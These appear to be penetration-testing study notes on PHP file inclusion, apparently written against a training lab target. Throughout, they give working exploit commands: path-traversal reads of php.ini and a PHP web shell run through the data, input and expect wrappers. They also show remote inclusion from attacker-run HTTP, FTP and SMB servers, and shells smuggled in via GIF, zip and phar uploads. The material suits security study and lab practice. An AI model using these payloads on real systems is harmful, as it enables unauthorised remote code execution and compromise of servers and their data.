9.1 File Inclusion- Remote

PHP Wrappers

Achieve remote code execution directly through the vulnerable function

Data Wrapper

Only available under allow_url_include setting enabled.

Check for the version in php.ini

curl "http://94.237.62.195:35567/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include

RCE with Data Wrapper

echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

http://94.237.62.195:35567/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

RCE with Input wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://94.237.62.195:35567/index.php?language=php://input&cmd=id" | grep uid

RCE with Expect wrapper
Grep 'expect'

curl "http://94.237.62.195:35567/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect


curl -s "http://94.237.62.195:35567/index.php?language=expect://id"

RFI

https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion

Step 1 : Verify RFI

 echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include

allow_url_include = On


http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php

Step 2a RCE via 80/443

echo '<?php system($_GET["cmd"]); ?>' > shell.php

 sudo python3 -m http.server <LISTENING_PORT>

http://test/index.php?language=http://test:8081/shell.php&cmd=id

Step 2b RCE via FTP

sudo python -m pyftpdlib -p 21


http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id


curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'

Step 2b RCE via SMB

impacket-smbserver -smb2support share $(pwd)

http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami

LFI and File Uploads

Image

Upload the below malicious file then execute it.

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id

ZIP upload - PHP Specific

upload the shell.jpg archive, we can include it with the zip wrapper as (zip://shell.jpg), and then refer to any files within it with #shell.php (URL encoded). Finally, we can execute commands as we always do with &cmd=id, as follows:

 echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

Phar upload

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

# compile into a phar

$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Research
LFI + uploads enabled + old PHP + exposed phpinfo())